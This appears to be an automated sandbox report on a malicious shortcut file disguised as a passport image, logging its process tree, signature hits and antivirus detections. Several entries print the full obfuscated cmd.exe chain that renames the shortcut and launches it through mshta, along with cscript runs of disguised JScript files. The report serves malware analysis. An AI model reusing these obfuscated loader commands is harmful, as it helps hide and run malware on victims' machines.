Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 13, 2021, 6 p.m. | July 13, 2021, 6:03 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xXqvbTYfJzOcV" C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk
2444-
cmd.exe "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
2584-
cmd.exe cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&"""
2668-
NETSTAT.EXE netstat -x
2732 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo "
2776 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd""
2812 -
cmd.exe C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &""
2864-
HOSTNAME.EXE hostname
2908 -
chcp.com chcp /?
2956 -
cmd.exe cmd /c " echo do exit & mOvE /y "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"
3000-
-
cscript.exe "C:\Windows\System32\cscript.exe" "/E:jScript" "C:\Users\test22\AppData\Local\Temp\aria-debug-5070.log"
2052-
cscript.exe "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp"
2612
-
-
-
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe |
file | C:\Users\test22\AppData\Local\Temp\test.cmD |
file | C:\Users\test22\AppData\Local\Temp\DoublesidePassport.jpg.lnk |
cmdline | cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | mShTa "C:\Users\test22\img.dat" |
cmdline | C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo " |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" set /p l="%Yf%hTa "%2.%1"" 1>"C:\Users\test22\AppData\Local\Temp\test.cMd"" |
file | C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\TextTransforms.exe |
wmi | SELECT UUID FROM Win32_ComputerSystemProduct |
wmi | SELECT Version FROM Win32_OperatingSystem |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | cmd /c " echo do exit & mOvE /y "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd C:\Users\test22\AppData\Local\Temp & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &" |
cmdline | cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | "C:\Windows\System32\cmd.exe" /c chgport & echo hello & set Oa=C:\Users\test22\AppData\Local\Temp\test.c& cmd /c " set Ux=%cd%& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break ^& for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) ^& chcp /? ^& cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |
cmdline | netstat -x |
cmdline | C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit & %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" & echo test5 & cd %Ux% & C:\Users\test22\AppData\Local\Temp\test.cmD dat C:\Users\test22\img &"" |
cmdline | chcp /? |
wmi | SELECT UUID FROM Win32_ComputerSystemProduct |
FireEye | Heur.BZC.YAX.Pantera.10.174A1AAB |
ALYac | Heur.BZC.YAX.Pantera.10.174A1AAB |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Pantera.10.174A1AAB |
MicroWorld-eScan | Heur.BZC.YAX.Pantera.10.174A1AAB |
Ad-Aware | Heur.BZC.YAX.Pantera.10.174A1AAB |
Emsisoft | Heur.BZC.YAX.Pantera.10.174A1AAB (B) |
SentinelOne | Static AI - Suspicious LNK |
GData | Heur.BZC.YAX.Pantera.10.174A1AAB |
MAX | malware (ai score=82) |
Arcabit | Heur.BZC.YAX.Pantera.10.174A1AAB |
Microsoft | Trojan:Script/Wacatac.B!ml |
VBA32 | Trojan.Link.Crafted |
Panda | JS/BondatN.gen |
parent_process | cscript.exe | martian_process | DoublesidePassport.jpg | ||||||
parent_process | cscript.exe | martian_process | Cscript "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp" | ||||||
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\test22\AppData\Roaming\Microsoft\VsGraphics\VisualStudio Graphics\Pictures\wctNVCHIP.tmp" |
cmdline | cmd /c " set Ux=C:\Users\test22\AppData\Local\Temp& echo dEL "%0" ^& mS> "%Oa%mD"& set jeC=vE /y & set tEX=C:\Users\test22\AppData\Local\Temp\temp*& echo stop & set /p Yf= <"%Oa%md"&netstat -x & echo | set /p l="%Yf%hTa "%2.%1""> "%Oa%Md"& set eym=mO& echo continue & C:\Windows\system32\cmd.exe /C "(if not exist "Doub*.*k " (for /d %j in ("%tEX%") do echo break & for %h in ("%j\Doub*.*k") do cd "%j") else (hostname)) & chcp /? & cmd /c " echo do exit ^& %eym%%jeC% "Doub*.*k " "C:\Users\test22\img.dat" ^& echo test5 ^& cd %Ux% ^& %Oa%mD dat C:\Users\test22\img ^&""" |